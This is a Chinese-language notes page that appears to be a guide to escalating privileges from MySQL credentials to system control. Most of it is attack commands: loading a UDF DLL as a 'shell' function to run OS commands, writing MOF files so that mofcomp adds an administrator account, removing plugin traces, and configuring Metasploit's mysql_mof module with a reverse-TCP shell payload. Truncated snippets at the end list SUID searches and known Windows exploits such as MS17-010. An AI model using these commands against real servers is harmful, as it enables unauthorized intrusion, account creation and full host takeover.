在拿到資料庫賬號密碼後,檢視使用者許可權,本地路徑,版本資訊
select user(); select @@basedir; select version();
select @@plugin_dir ; #查詢到mysql的plugin位置
# mysql版本<5.1,udf匯出到系統目錄c:/windows/system32/ 如windows2003放到c:\windows\system32
#mysql版本》5.1,udf匯出到安裝路徑:windows在mysql\lib\plugin\(plugin預設不存在,需自建)linux則在/usr/lib/mysql/plugin下
show global variables like '%secure%';# mysql版本<5.5.53 , secure_file_priv 預設為空
# mysql版本》=5.5.53 ,secure_file_priv 預設為null
0x02 建立函式
將udf.dll指令碼上傳至指定目錄後執行命令
create function shell returns string soname 'udf.dll'; # 建立函式
select shell('cmd','whoami'); #執行命令
指令碼鏈結
如果遇到functionsys_evalalready exists問題,執行以下語句
drop function if exists lib_mysqludf_sys_so;
drop function if exists sys_get;
drop function if exists sys_set;
drop function if exists sys_exec;
drop function if exists sys_eval;
drop function if exists shell;
drop function if exists cmd;
select * from mysql.plugin;
delete from mysql.plugin;
連線菜刀,上傳兩個mof檔案adduser.mof,addtoadmin.mof至c:windows/system32/wbem/mof/
select load_file(c:/wmpub/nullevt.mof) into dumpfile 'c:/windows/system32/wbem/mof/nulevt.mof'
虛擬終端進入此目錄下,執行命令:mofcomp.exe adduser.mof 等待數秒後net user 檢視使用者是否新增成功,再執行mofcomp.exe addtoadmin.mof 等待數秒後 net user 使用者名稱 檢視是否新增到administrators組中
use exploit/windows/mysql/mysql_mof #選取模組
options #檢視所需配置引數
set username ***
set password ***
set rhost ***.***.***.***
set payload windows/shell_reverse_tcp #選擇payload
options
set lhost ***x
set lport ***
exploit #執行
內網滲透 linux提權
查詢所有者為使用者的檔案 find type f user 使用者名稱 2 dev null 檢視帶有root許可權的suid命令 find type f perm u s 2 dev null find perm g s o perm u s type f 2 dev null type d 目錄...
內網提權 系統篇
windows 系統漏洞 ms系列 ms08 067 rpcms09 012 pr.exe 巴西烤肉提權 ms09 020 iis5 6 ms12 202 rdp藍屏 ms17 010 永恆之藍 wannacry cve 2019 0708 rdp 命令執行 粘滯鍵提權 sethc.exe 使用cm...
mysql提權原始碼 mysql提權
namp 掃瞄ip埠 cms 探測 wpscan kali 工具 wpscan 掃瞄出來使用者名稱。用使用者名稱登入ssh 然後利用mysql udf提權。2.gcc g shared wl,soname,raptor udf.so o raptor udf.so raptor udf.o lc 3...